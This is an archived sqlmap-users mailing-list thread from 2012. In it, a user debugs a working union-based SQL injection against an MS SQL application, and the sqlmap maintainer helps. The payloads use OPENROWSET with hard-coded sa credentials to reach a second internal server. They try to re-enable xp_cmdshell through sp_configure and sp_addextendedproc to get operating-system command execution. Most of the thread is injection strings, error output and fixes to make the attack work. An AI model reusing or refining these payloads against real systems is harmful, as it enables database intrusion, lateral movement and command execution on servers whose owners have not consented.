Re: [sqlmap-users] error with ms sql
Brought to you by:
inquisb
Menu
▾
▴
Re: [sqlmap-users] error with ms sql
|
From: Adi M. <adi...@ya...> - 2012-06-21 11:12:17
|
-1 union all select '1','2','3','4','5','6','7','8','9','10','11','12', ( select * from OPENROWSET('SQLOLEDB','uid=sa;pwd=1234;Network=;Address=192.168.1.4;timeout=5',' select @@version; master..sp_configure ''xp_cmdshell'',1 ')),'aaa','15','16','17','18','19','20','21' from teachers7 where id=808
the problem is with the query:
select @@version; master..sp_configure ''xp_cmdshell'',1
Any possibility to give the string from ascii codes as in mysql?
________________________________
From: Miroslav Stampar <mir...@gm...>
To: Adi Mutu <adi...@ya...>
Cc: "sql...@li..." <sql...@li...>
Sent: Thursday, June 21, 2012 2:01 PM
Subject: Re: [sqlmap-users] error with ms sql
It all depends on context. You'll need to send a sample that you want to run. Quotes are not interpreted/parsed everywhere the same.
Kind regards
On Thu, Jun 21, 2012 at 12:57 PM, Adi Mutu <adi...@ya...> wrote:
my feeling is that
>"[OLE/DB provider returned message: Deferred prepare could not be completed." is because of an sql error:) so my fault.
>
>
>
>and regarding the second error, I think you must always return some columns in the query , such as select @@version.
>
>
>now question is how do i embed a string inside another string delimited with quotes? Looks like double quotes is not working.....doubling quote '' looks like not working always....
>
>
>
>________________________________
> From: Adi Mutu <adi...@ya...>
>To: Miroslav Stampar <mir...@gm...>
>Cc: "sql...@li..." <sql...@li...>
>Sent: Thursday, June 21, 2012 11:45 AM
>Subject: Re: [sqlmap-users] error with ms sql
>
>
>tried, same stuff.
>I've tried to reenable xp_cmdshell first with
>
>
>master..sp_configure 'show advanced options',1
>reconfigure
>master..sp_configure 'xp_cmdshell',1
>reconfigure
>
>
>and got the same error: [OLE/DB provider returned message: Deferred prepare could not be completed.]
>
>
>then with 'exec sp_addextendedproc "xp_cmdshell","xp_log70.dll" '
>and got error:
>
>
>OLE DB error trace [Non-interface error:
OLE DB provider unable to process object, since the object has no
columnsProviderName='SQLOLEDB', Query=exec sp_addextendedproc
"xp_cmdshell","xp_log70.dll" '].
>
>
>
>
>
>
>________________________________
> From: Miroslav Stampar <mir...@gm...>
>To: Adi Mutu <adi...@ya...>
>Cc: "sql...@li..." <sql...@li...>
>Sent: Thursday, June 21, 2012 11:26 AM
>Subject: Re: [sqlmap-users] error with ms sql
>
>
>try with master..resultabcd
>
>
>i forgot to mention that there needs to be two dots (or schema name in between) between db name and table name in mssql
>
>
>On Thu, Jun 21, 2012 at 10:24 AM, Adi Mutu <adi...@ya...> wrote:
>
>Hi Miroslav,
>>
>>
>>got db_name master and tried with master.resultabcd but i get the same error.
>>
>>
>>Kind Regards,
>>A.
>>
>>
>>
>>________________________________
>> From: Miroslav Stampar <mir...@gm...>
>>To: Adi Mutu <adi...@ya...>
>>Cc: "sql...@li..." <sql...@li...>
>>Sent: Thursday, June 21, 2012 11:11 AM
>>Subject: Re: [sqlmap-users] error with ms sql
>>
>>
>>
>>Hi Adi.
>>
>>
>>You could try prepending the database name to the resultbcd. It seems that in case of linked server(s) doing that fixes the mentioned problem (Reference: http://cadarsh.blogspot.com/2011/02/deferred-prepare-could-not-be-completed.html?showComment=1336571978284#c7393130515903351466)
>>
>>
>>Kind regards,
>>Miroslav Stampar
>>
>>
>>On Thu, Jun 21, 2012 at 10:01 AM, Adi Mutu <adi...@ya...> wrote:
>>
>>I'm having an injection like this:
>>>openrowset in a union (I've managed to do a SELECT @@version on 192.168.1.4)
>>>
>>>
>>>-1 union all select '1','2','3','4','5','6','7','8','9','10','11','12', ( select * from OPENROWSET('SQLOLEDB','uid=sa;pwd=1234;Network=;Address=192.168.1.4;timeout=5','select output from resultbcd')),'aaa','15','16','17','18','19','20','21' from teachers7 where id=808
>>>
>>>
>>>
>>>and when I try to select form resultabcd i get:
>>>[OLE/DB provider returned message: Deferred prepare could not be completed.]
>>>
>>>
>>>
>>>could not find a good answer with google. Thanks.
>>>
>>>
>>>Kind regards,
>>>A.
>>>------------------------------------------------------------------------------
>>>Live Security Virtual Conference
>>>Exclusive live event will cover all the ways today's security and
>>>threat landscape has changed and how IT managers can respond. Discussions
>>>will include endpoint security, mobile security and the latest in malware
>>>threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/
>>>_______________________________________________
>>>sqlmap-users mailing list
>>>sql...@li...
>>>https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>
>>>
>>
>>
>>
>>--
>>Miroslav Stampar
>>http://about.me/stamparm
>>
>>
>>
>
>
>
>--
>Miroslav Stampar
>http://about.me/stamparm
>
>
>
>------------------------------------------------------------------------------
>Live Security Virtual Conference
>Exclusive live event will cover all the ways today's security and
>threat landscape has changed and how IT managers can respond. Discussions
>will include endpoint security, mobile security and the latest in malware
>threats. http://www.accelacomm.com/jaw/sfrnl04242012/114/50122263/
>_______________________________________________
>sqlmap-users mailing list
>sql...@li...
>https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>
>
--
Miroslav Stampar
http://about.me/stamparm |
